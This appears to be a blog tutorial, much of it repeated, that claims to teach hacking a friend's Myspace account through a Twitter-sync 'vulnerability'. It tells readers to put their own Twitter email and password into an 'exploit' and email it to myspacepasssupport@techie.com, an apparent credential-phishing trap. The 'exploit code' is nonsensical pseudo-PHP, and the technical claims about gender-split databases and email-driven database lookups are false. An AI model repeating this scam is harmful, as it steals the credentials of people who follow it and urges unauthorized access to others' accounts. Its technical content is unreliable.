Do you want to learn how to hack Myspace?, Are you looking for a way to hack your friends Myspace account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their message inbox or use a glitch to use a hacking script. In this article I will show you a fairly easy step by step guide on how to hack myspace user accounts without having to directly hack into myspace and risk getting caught. Ignore all those hacking services, myspace hacks and hackers that charge you money for something you can do on your own for free - hack the password of any of your friends accounts even as a prank or joke. You may also be interested in trying out our How To Hack Twitter Accounts exploit tutorial).
Hack myspace, hacking myspace passwords from user accounts and find out someones myspace password...Is any of it really possible? Yes it is, thanks to Twitter!. By now, you have probably heard the rumors of how unsafe MySpace is and how there are viruses out there that infect it's users, you might have also seen Twitter allows you to synchronize your tweets with Myspace status updates. In doing so, Myspace has created many vulnerabilities for itself by allowing a third party (Twitter) to access their database. This problem is due to Myspace's poor coding/programming which causes all those errors and lacks features making many of its users simply leave for other social networks.
A couple of month's ago I wanted to check my old Myspace account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a myspace account hacking code or exploit as they are called.
If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.
So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned Myspace uses something similar to an email service to contact their databases.
For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password).
Luckily for us, as mentioned above, through the use of Twitter combined with Myspace's poor programing, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on Myspace...you can use your Twitter account to verify your their friend on Myspace and get their login email and password sent to you...but the victim must be on your friends list on myspace.
1) First off you will need to get your user id and the victims user id name, how do you do this?
Go to the victims profile and look at your browsers address bar, it is located after; myspace.com/THIS_IS_THE_ID. You should see something like this: (I have circled the user id in red)
Write it down somewhere and do the same procedure but this time to find out your own user id, once you have them both you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.
Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the myspace user id of the victim and the friend authentication twitter login information. I have taken a screenshot of what parts you have to edit and with what:
1. Should be the victims Myspace user id.
2. Should be your twitter email/username to verify your the victims friend on myspace.
3. Should be your twitter password so the database can authentic you really are friends with the victim on Myspace through the third-party sync vulnerability.
When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email...we will have to use a special Subject so the database knows how to read it.
Go to your email address and Compose a new email to myspacepasssupport@techie.com which is one of their customer service emails, in the Subject copy and paste the code below highlighted in gray:
Once you have edited the Subject and entered the email your Composed email should look like the screenshot below, I will numerate each item:
1. The email address of the database's forgotten password customer service.
2. Insert M or F (male or female, if your a male then choose M and if your a female then choose F) in between the Quotes (") so the database knows what gender section to search in when verifying you are on the victims friend list.
3. This is where you insert the victims myspace user id.
4. This is where you insert your myspace user id.
5) After you have correctly written the To: and Subject sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email. Now all you have to do is click Send and wait for the database to send you back it's reply with the information.
It should take from 12-48 hours depending on the traffic Myspace has that day, this is a sample of the email response you'll receive:
Hack myspace, hacking myspace passwords from user accounts and find out someones myspace password...Is any of it really possible? Yes it is, thanks to Twitter!. By now, you have probably heard the rumors of how unsafe MySpace is and how there are viruses out there that infect it's users, you might have also seen Twitter allows you to synchronize your tweets with Myspace status updates. In doing so, Myspace has created many vulnerabilities for itself by allowing a third party (Twitter) to access their database. This problem is due to Myspace's poor coding/programming which causes all those errors and lacks features making many of its users simply leave for other social networks.
A couple of month's ago I wanted to check my old Myspace account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a myspace account hacking code or exploit as they are called.
HOW IT WORKS
Myspace has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account. If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.
So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned Myspace uses something similar to an email service to contact their databases.
For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password).
Luckily for us, as mentioned above, through the use of Twitter combined with Myspace's poor programing, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on Myspace...you can use your Twitter account to verify your their friend on Myspace and get their login email and password sent to you...but the victim must be on your friends list on myspace.
HOW TO DO IT
1) First off you will need to get your user id and the victims user id name, how do you do this?
Go to the victims profile and look at your browsers address bar, it is located after; myspace.com/THIS_IS_THE_ID. You should see something like this: (I have circled the user id in red)
Write it down somewhere and do the same procedure but this time to find out your own user id, once you have them both you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.
Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the myspace user id of the victim and the friend authentication twitter login information. I have taken a screenshot of what parts you have to edit and with what:
1. Should be the victims Myspace user id.
2. Should be your twitter email/username to verify your the victims friend on myspace.
3. Should be your twitter password so the database can authentic you really are friends with the victim on Myspace through the third-party sync vulnerability.
When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email...we will have to use a special Subject so the database knows how to read it.
Go to your email address and Compose a new email to myspacepasssupport@techie.com which is one of their customer service emails, in the Subject copy and paste the code below highlighted in gray:
$[search_database = }""{] $find user+id= "", '%verification+id' = }""{ begin_search();
Once you have edited the Subject and entered the email your Composed email should look like the screenshot below, I will numerate each item:
1. The email address of the database's forgotten password customer service.
2. Insert M or F (male or female, if your a male then choose M and if your a female then choose F) in between the Quotes (") so the database knows what gender section to search in when verifying you are on the victims friend list.
3. This is where you insert the victims myspace user id.
4. This is where you insert your myspace user id.
5) After you have correctly written the To: and Subject sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email. Now all you have to do is click Send and wait for the database to send you back it's reply with the information.
It should take from 12-48 hours depending on the traffic Myspace has that day, this is a sample of the email response you'll receive:
THE EXPLOIT CODE
ms_select_db("find", $linkID) or die(msdatabase_error());
$resultID = ms_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(msdatabase_error());
$num_rows = db_num_rows($resultID);
$row = myspace_fetch_array($resultID);
$user_id = $row[0];
if ($user_id == "PUTUSERIDHERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that ID.
}
else {
// print "We're sorry, your friend ID does not appear to be in our database."
$passwordfromdb = $row[0];
$find userID = (%friend_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "PUTEMAILHERE"; (%friend_vulnerability_email%)
#user password = "PUTPASSWORDHERE"; (%friend_vulnerability_pass%)
$friend_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email
session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {
0 comments:
Post a Comment